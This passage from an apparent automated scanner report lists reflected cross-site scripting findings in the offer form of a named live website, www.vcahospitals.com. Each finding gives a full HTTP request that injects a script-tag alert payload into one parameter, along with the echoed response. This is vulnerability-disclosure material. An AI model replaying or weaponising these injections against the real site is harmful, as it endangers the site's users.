5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohcttmqldd2o8ov91qf8l0ptp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.52. http://www.vcahospitals.com/main/offer [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835b4"><script>alert(1)</script>e5f0d47fe97 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9duq7ra7irdi2bi4ngj9f38dk7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.53. http://www.vcahospitals.com/main/offer/ [ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4ae"><script>alert(1)</script>6cab6f57fc7 was submitted in the parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?=37a4ae"><script>alert(1)</script>6cab6f57fc7&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=37a4ae"><script>alert(1)</script>6cab6f57fc7&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-fo
...[SNIP]...

2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80fb4"><script>alert(1)</script>58eba80557c was submitted in the &optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&optin=180fb4"><script>alert(1)</script>58eba80557c&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=180fb4"><script>alert(1)</script>58eba80557c&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.55. http://www.vcahospitals.com/main/offer/ [&state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc88"><script>alert(1)</script>a3145493564 was submitted in the &state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL3fc88"><script>alert(1)</script>a3145493564&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL3fc88"><script>alert(1)</script>a3145493564&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.56. http://www.vcahospitals.com/main/offer/ [addr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42b0"><script>alert(1)</script>3f63bb4fc1f was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7hsjo72anm75fuu66qlgrcdl51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2f
...[SNIP]...

2.57. http://www.vcahospitals.com/main/offer/ [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a762"><script>alert(1)</script>ca37e104d6b was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=fo15h1tlhcbbnb166klq5i4j61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vc
...[SNIP]...

2.58. http://www.vcahospitals.com/main/offer/ [date parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b79"><script>alert(1)</script>b01a5b3d5be was submitted in the date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%25